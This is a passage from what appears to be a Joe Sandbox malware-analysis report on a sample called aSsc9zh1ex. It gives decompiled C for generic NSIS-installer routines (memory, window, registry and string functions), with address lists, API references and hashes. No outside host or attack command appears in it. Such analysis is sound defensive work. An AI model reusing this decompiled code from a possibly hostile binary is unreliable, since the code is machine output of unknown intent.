						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                                                                              0x6f0010eb
                                                                                                                              0x6f001100
                                                                                                                              0x6f001109
                                                                                                                              0x6f00110e
                                                                                                                              0x6f001119
                                                                                                                              0x6f00111c
                                                                                                                              0x6f001125
                                                                                                                              0x6f001129
                                                                                                                              0x6f00112b
                                                                                                                              0x6f0012b0
                                                                                                                              0x6f0012ba
                                                                                                                              0x6f0012ba
                                                                                                                              0x6f001132
                                                                                                                              0x6f001132
                                                                                                                              0x6f001137
                                                                                                                              0x6f001138
                                                                                                                              0x6f00113a
                                                                                                                              0x6f00113d
                                                                                                                              0x6f001256
                                                                                                                              0x6f001259
                                                                                                                              0x6f001271
                                                                                                                              0x6f001271
                                                                                                                              0x6f001278
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f001285
                                                                                                                              0x6f00128a
                                                                                                                              0x6f00128f
                                                                                                                              0x6f001294
                                                                                                                              0x6f00129a
                                                                                                                              0x6f00129b
                                                                                                                              0x00000000
                                                                                                                              0x6f00129b
                                                                                                                              0x6f00125b
                                                                                                                              0x6f00125e
                                                                                                                              0x6f0011bc
                                                                                                                              0x6f0011bf
                                                                                                                              0x6f0011c2
                                                                                                                              0x6f0011cb
                                                                                                                              0x6f0011d0
                                                                                                                              0x00000000
                                                                                                                              0x6f0011d1
                                                                                                                              0x6f001264
                                                                                                                              0x6f001266
                                                                                                                              0x6f0011a2
                                                                                                                              0x6f0011a5
                                                                                                                              0x6f0011a8
                                                                                                                              0x6f0011b1
                                                                                                                              0x00000000
                                                                                                                              0x6f0011b1
                                                                                                                              0x6f001164
                                                                                                                              0x6f001165
                                                                                                                              0x6f001177
                                                                                                                              0x6f001180
                                                                                                                              0x6f001184
                                                                                                                              0x6f00118e
                                                                                                                              0x6f001191
                                                                                                                              0x6f001193
                                                                                                                              0x6f001193
                                                                                                                              0x00000000
                                                                                                                              0x6f001165
                                                                                                                              0x6f001143
                                                                                                                              0x6f001218
                                                                                                                              0x6f00121d
                                                                                                                              0x6f001221
                                                                                                                              0x6f001223
                                                                                                                              0x6f00122c
                                                                                                                              0x6f00122f
                                                                                                                              0x6f001238
                                                                                                                              0x6f00123d
                                                                                                                              0x6f00123d
                                                                                                                              0x6f001247
                                                                                                                              0x6f00124a
                                                                                                                              0x00000000
                                                                                                                              0x6f001250
                                                                                                                              0x6f001149
                                                                                                                              0x6f00114c
                                                                                                                              0x6f0011e9
                                                                                                                              0x6f0011ed
                                                                                                                              0x6f0011f7
                                                                                                                              0x6f0011fb
                                                                                                                              0x6f001205
                                                                                                                              0x6f00120a
                                                                                                                              0x6f001211
                                                                                                                              0x00000000
                                                                                                                              0x6f001211
                                                                                                                              0x6f001152
                                                                                                                              0x6f001155
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x6f00115b
                                                                                                                              0x6f00115e
                                                                                                                              0x6f0011b8
                                                                                                                              0x00000000
                                                                                                                              0x6f0011b8
                                                                                                                              0x6f001160
                                                                                                                              0x6f001162
                                                                                                                              0x6f00119e
                                                                                                                              0x00000000
                                                                                                                              0x6f00119e
                                                                                                                              0x00000000
                                                                                                                              0x6f0012a1
                                                                                                                              0x6f0012a1
                                                                                                                              0x6f0012ab
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F001171
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6F0011E3
                                                                                                                              • GlobalFree.KERNEL32 ref: 6F00124A
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 6F00129B
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F0012B1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$Alloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1780285237-0
                                                                                                                              • Opcode ID: d7dd44a0f6db379d2b4d0ce7a4927493ae0dd9bb5d1b790e88f17f98f5347059
                                                                                                                              • Instruction ID: 428471b4cd034b6a7a2f628ca24974f7dd6fd788b83df96771511ab574a5e36a
                                                                                                                              • Opcode Fuzzy Hash: d7dd44a0f6db379d2b4d0ce7a4927493ae0dd9bb5d1b790e88f17f98f5347059
                                                                                                                              • Instruction Fuzzy Hash: BC5141B9904606DFFB00EF68CD48B6A77E4FF0A329B40451AF944DB250E734A920DB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040653C("C:\Users\Arthur\AppData\Local\Temp\nso8B47.tmp", "C:\Users\Arthur\AppData\Local\Temp\nso8B47.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nso8B47.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adc8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040647A(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060EB(_t31, _t31) >= 0) {
						_t14 = E004060BC(_t31, "C:\Users\Arthur\AppData\Local\Temp\nso8B47.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                                                              0x0040263e
                                                                                                                              0x0040263e
                                                                                                                              0x0040263e
                                                                                                                              0x00402643
                                                                                                                              0x00402646
                                                                                                                              0x00402649
                                                                                                                              0x0040264e
                                                                                                                              0x00402650
                                                                                                                              0x00402670
                                                                                                                              0x004026aa
                                                                                                                              0x00402672
                                                                                                                              0x00402674
                                                                                                                              0x00402688
                                                                                                                              0x00402695
                                                                                                                              0x00402695
                                                                                                                              0x00402652
                                                                                                                              0x00402654
                                                                                                                              0x00402659
                                                                                                                              0x00402667
                                                                                                                              0x0040266a
                                                                                                                              0x004026af
                                                                                                                              0x004026b2
                                                                                                                              0x0040292e
                                                                                                                              0x0040292e
                                                                                                                              0x004026b8
                                                                                                                              0x004026c1
                                                                                                                              0x004026c3
                                                                                                                              0x004026e2
                                                                                                                              0x004015b4
                                                                                                                              0x004015b6
                                                                                                                              0x00000000
                                                                                                                              0x004015bc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004026c3
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso8B47.tmp\System.dll), ref: 00402695
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nso8B47.tmp$C:\Users\user\AppData\Local\Temp\nso8B47.tmp\System.dll
                                                                                                                              • API String ID: 1659193697-2464840629
                                                                                                                              • Opcode ID: 104dd853bd667d595f2d4ef041d665a4b8afd0d56644d2e5248bfccfef6cc724
                                                                                                                              • Instruction ID: fdcd3470e26f59c64840f8c249bec33fde4ddddd182ca34a55142dcc3fd3dd5a
                                                                                                                              • Opcode Fuzzy Hash: 104dd853bd667d595f2d4ef041d665a4b8afd0d56644d2e5248bfccfef6cc724
                                                                                                                              • Instruction Fuzzy Hash: 6211E772A10315FACB10BBB19F4AE9E7670AF40748F21443FE002B21C1D6FD8891565E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x79f700; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a8a6c;
						if(_t2 >  *0x7a8a6c) {
							_t3 = CreateDialogParamW( *0x7a8a60, 0x6f, 0, E00402F93, 0);
							 *0x79f700 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406923(0);
					}
				} else {
					_t6 =  *0x79f700; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x79f700 = 0;
					return _t6;
				}
			}






                                                                                                                              0x00403020
                                                                                                                              0x0040303a
                                                                                                                              0x00403040
                                                                                                                              0x0040304a
                                                                                                                              0x00403050
                                                                                                                              0x00403056
                                                                                                                              0x00403067
                                                                                                                              0x00403070
                                                                                                                              0x00000000
                                                                                                                              0x00403075
                                                                                                                              0x0040307c
                                                                                                                              0x00403042
                                                                                                                              0x00403049
                                                                                                                              0x00403049
                                                                                                                              0x00403022
                                                                                                                              0x00403022
                                                                                                                              0x00403029
                                                                                                                              0x0040302c
                                                                                                                              0x0040302c
                                                                                                                              0x00403032
                                                                                                                              0x00403039
                                                                                                                              0x00403039

                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040302C
                                                                                                                              • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040385A,?), ref: 00403075
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2102729457-0
                                                                                                                              • Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                                                                                                                              • Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
                                                                                                                              • Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                                                                                                                              • Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004054F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 89%
                                                                                                                              			E004054F0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f34 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f34 = _t16;
							E00404EB1();
						}
						L11:
						return CallWindowProcW( *0x7a1f3c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E31(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044C2(0x413);
				return 0;
			}





                                                                                                                              0x004054f4
                                                                                                                              0x004054fe
                                                                                                                              0x0040551a
                                                                                                                              0x0040553c
                                                                                                                              0x0040553f
                                                                                                                              0x00405545
                                                                                                                              0x0040554f
                                                                                                                              0x00405550
                                                                                                                              0x00405552
                                                                                                                              0x00405558
                                                                                                                              0x00405558
                                                                                                                              0x00405562
                                                                                                                              0x00000000
                                                                                                                              0x00405570
                                                                                                                              0x00405527
                                                                                                                              0x0040555f
                                                                                                                              0x0040555f
                                                                                                                              0x00000000
                                                                                                                              0x0040555f
                                                                                                                              0x00405533
                                                                                                                              0x00405535
                                                                                                                              0x00000000
                                                                                                                              0x00405535
                                                                                                                              0x00405504
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040550b
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040551F
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405570
                                                                                                                                • Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                              • Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                                                                                                                              • Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
                                                                                                                              • Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                                                                                                                              • Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004063E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E004063E8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406387(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                              0x004063f6
                                                                                                                              0x004063f8
                                                                                                                              0x00406410
                                                                                                                              0x00406415
                                                                                                                              0x0040641a
                                                                                                                              0x00406458
                                                                                                                              0x00406458
                                                                                                                              0x0040641c
                                                                                                                              0x0040642e
                                                                                                                              0x00406439
                                                                                                                              0x0040643f
                                                                                                                              0x0040644a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040644a
                                                                                                                              0x0040645e

                                                                                                                              APIs
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F28,00000000,?,?,Call,?,?,0040664F,80000002), ref: 0040642E
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040664F,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 00406439
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseQueryValue
                                                                                                                              • String ID: Call
                                                                                                                              • API String ID: 3356406503-1824292864
                                                                                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                              • Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
                                                                                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                              • Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403B34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00403B34() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79ff0c; // 0x8f5000
				_t3 = E00403B19(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79ff0c =  *0x79ff0c & 0x00000000;
				return _t3;
			}







                                                                                                                              0x00403b35
                                                                                                                              0x00403b3d
                                                                                                                              0x00403b44
                                                                                                                              0x00403b47
                                                                                                                              0x00403b47
                                                                                                                              0x00403b49
                                                                                                                              0x00403b4e
                                                                                                                              0x00403b55
                                                                                                                              0x00403b5b
                                                                                                                              0x00403b5f
                                                                                                                              0x00403b60
                                                                                                                              0x00403b68

                                                                                                                              APIs
                                                                                                                              • FreeLibrary.KERNEL32(?,76D73420,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
                                                                                                                              • GlobalFree.KERNEL32(008F5000), ref: 00403B55
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 1100898210-3355392842
                                                                                                                              • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                                                                              • Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
                                                                                                                              • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                                                                              • Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405F6F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405F6F(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
